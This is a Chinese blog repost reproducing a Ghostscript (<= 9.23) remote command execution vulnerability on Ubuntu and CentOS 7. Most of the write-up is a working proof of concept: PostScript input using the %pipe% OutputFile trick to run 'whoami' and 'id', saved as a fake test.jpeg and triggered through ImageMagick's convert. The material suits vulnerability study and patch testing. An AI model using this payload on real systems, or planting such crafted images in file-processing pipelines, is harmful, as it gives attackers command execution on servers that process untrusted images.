博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
ghostscript 远程命令执行漏洞复现
阅读量:2259 次
发布时间:2019-05-09

本文共 907 字,大约阅读时间需要 3 分钟。

影响的版本 <= 9.23(全版本、全平台)

Ubuntu

开启 ghostscript

sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null

依次输入

legal{ null restore } stopped { pop } iflegalmark /OutputFile (%pipe%whoami) currentdevice putdevicepropsshowpage

执行结果

poc

%!PSuserdict /setpagedevice undefsavelegal{ null restore } stopped { pop } if{ legal } stopped { pop } ifrestoremark /OutputFile (%pipe%whoami) currentdevice putdeviceprops

用 vim 将 poc 保存为 test.jpeg,执行

sch01ar@ubuntu:~$ convert test.jpeg 1.jpg

执行结果,1.jpg 随便写

Centos 7

开启 ghostscript

[root@sch01ar ~]# gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null

依次输入

legal{ null restore } stopped { pop } iflegalmark /OutputFile (%pipe%id) currentdevice putdevicepropsshowpage

执行结果

poc

%!PSuserdict /setpagedevice undeflegal{ null restore } stopped { pop } iflegalmark /OutputFile (%pipe%id) currentdevice putdeviceprops

 

转载于:https://www.cnblogs.com/sch01ar/p/9523155.html

你可能感兴趣的文章
OC常用数学函数及常量
查看>>
程序员实用工具、学习网站推荐
查看>>
IntelliJ IDEA Mac 常用快捷键
查看>>
iOS URL schema简介
查看>>
mysql不能插入中文或者不能显示中文的解决方案
查看>>
利用C++ STL 对多个字符串进行查询、排序和统计等
查看>>
利用C++ STL 读取文件和显示相关信息
查看>>
Unicode汉字编码表
查看>>
Ubuntu16.04下安装配置Android studio,sdk,gradle——一篇文章就够了系列
查看>>
java字符串转算术表达式
查看>>
Ubuntu下Android studio常用快捷键集锦
查看>>
Netbeans 8.2不能输入中文的情况解决方案
查看>>
更换电脑硬盘遇到的各种问题以及解决方案
查看>>
NetBeans8.2 IDE修改Java class默认注释
查看>>
NetBeans 8.2使用MinGW构建C/C++编译运行环境(windows10/ubuntu16.01)
查看>>
使用chrome的控制台查看网页内各节点颜色的方法
查看>>
PHP Non-Thread-Safe和Thread-Safe的区别
查看>>
Xampp error:Port 80 in use by "Unable to open process" with PID 4!
查看>>
ASCII编码表
查看>>
Windows下任务栏、开始菜单图标文件夹位置
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-06-28 08:26:46   当前IP: 18.224.30.42   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我